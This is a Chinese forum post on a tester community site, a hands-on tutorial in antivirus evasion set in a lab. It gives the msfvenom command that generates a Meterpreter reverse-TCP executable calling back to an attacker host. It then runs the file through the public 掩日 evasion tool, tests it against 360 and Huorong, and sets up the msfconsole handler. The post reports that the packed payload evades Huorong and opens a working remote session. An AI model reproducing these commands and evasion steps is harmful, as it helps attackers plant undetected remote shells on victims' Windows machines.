测试派 Give testers a home.

登录 注册

实战:掩日免杀

本贴最后更新于 1094 天前,其中的信息可能已经物是人非

更新时间:2021.04.28

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

image.png

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

下载地址:

https://github.com/1y0n/av_evasion_tool/

将文件直接拖过来就行了

image.png

最后会生成一个YR_1.exe文件

image.png

将这两个文件分别压缩备份,发送到window10和window7上

image.png

3. 静态测试

打开各自的杀软进行测试

3.1 360

image.png

均报毒

3.2 火绒

image.png

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

msfconsole

use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

image.png

4.2 360下

4.2.1 1..exe

直接gg

image.png

4.2.2 免杀版1.exe

直接gg

image.png

4.3 火绒

4.3.1. 1.exe

gg

image.png

4.3.2 免杀版1.exe

上线正常

image.png

执行命令

image.png

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!👍

杭州 位置
3705 29 1162 907 28 41 11 1504

相关帖子

随便看看

回帖
请输入回帖内容 ...